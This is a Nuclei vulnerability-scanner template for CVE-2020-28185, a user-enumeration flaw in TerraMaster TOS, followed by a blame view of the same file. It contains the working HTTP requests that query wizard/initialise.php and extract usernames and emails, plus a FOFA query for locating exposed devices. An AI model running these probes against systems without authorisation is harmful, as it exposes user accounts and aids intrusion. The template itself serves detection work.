nuclei-templates/http/cves/2020/CVE-2020-28185.yaml

id: CVE-2020-28185

info:
  name: TerraMaster TOS < 4.2.06 - User Enumeration
  author: pussycat0x
  severity: medium
  description: |
    User Enumeration vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php.
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TerraMaster%20TOS%20%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E6%BC%8F%E6%B4%9E%20CVE-2020-28185.md
    - https://nvd.nist.gov/vuln/detail/CVE-2020-28185
    - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
  metadata:
    max-request: 1
    verified: true
    fofa-query: '"TerraMaster" && header="TOS"'
  tags: cve,cve2020,tamronos,enum,tos

http:
  - raw:
      - |
        GET /tos/index.php?user/login HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wizard/initialise.php HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Referer: {{RootURL}}/tos/index.php?user/login

        tab=checkuser&username=admin

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "username"
          - "email"
          - "status"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body_2
        regex:
          - '"username":"(.*?)"'
          - '"email":"(.*?)"'
TerraMaster TOS - User Enumeration 2023-08-08 09:35:46 +00:00			`id: CVE-2020-28185`

			`info:`
			`name: TerraMaster TOS < 4.2.06 - User Enumeration`
			`author: pussycat0x`
			`severity: medium`
fix template 2023-08-09 07:38:58 +00:00			`description: \|`
			`User Enumeration vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php.`
TerraMaster TOS - User Enumeration 2023-08-08 09:35:46 +00:00			`reference:`
			`- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TerraMaster%20TOS%20%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E6%BC%8F%E6%B4%9E%20CVE-2020-28185.md`
			`- https://nvd.nist.gov/vuln/detail/CVE-2020-28185`
fix template 2023-08-09 07:38:58 +00:00			`- https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/`
TerraMaster TOS - User Enumeration 2023-08-08 09:35:46 +00:00			`metadata:`
			`max-request: 1`
			`verified: true`
			`fofa-query: '"TerraMaster" && header="TOS"'`
fix template 2023-08-09 07:38:58 +00:00			`tags: cve,cve2020,tamronos,enum,tos`
TerraMaster TOS - User Enumeration 2023-08-08 09:35:46 +00:00
			`http:`
			`- raw:`
			`- \|`
			`GET /tos/index.php?user/login HTTP/1.1`
			`Host: {{Hostname}}`

			`- \|`
			`POST /wizard/initialise.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept-Encoding: gzip, deflate`
			`Content-Type: application/x-www-form-urlencoded; charset=UTF-8`
			`X-Requested-With: XMLHttpRequest`
fix template 2023-08-09 07:38:58 +00:00			`Referer: {{RootURL}}/tos/index.php?user/login`
TerraMaster TOS - User Enumeration 2023-08-08 09:35:46 +00:00
			`tab=checkuser&username=admin`

			`cookie-reuse: true`
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- "username"`
			`- "email"`
			`- "status"`
			`condition: and`

			`- type: status`
			`status:`
			`- 200`

			`extractors:`
			`- type: regex`
			`part: body_2`
			`regex:`
			`- '"username":"(.*?)"'`
fix template 2023-08-09 07:38:58 +00:00			`- '"email":"(.*?)"'`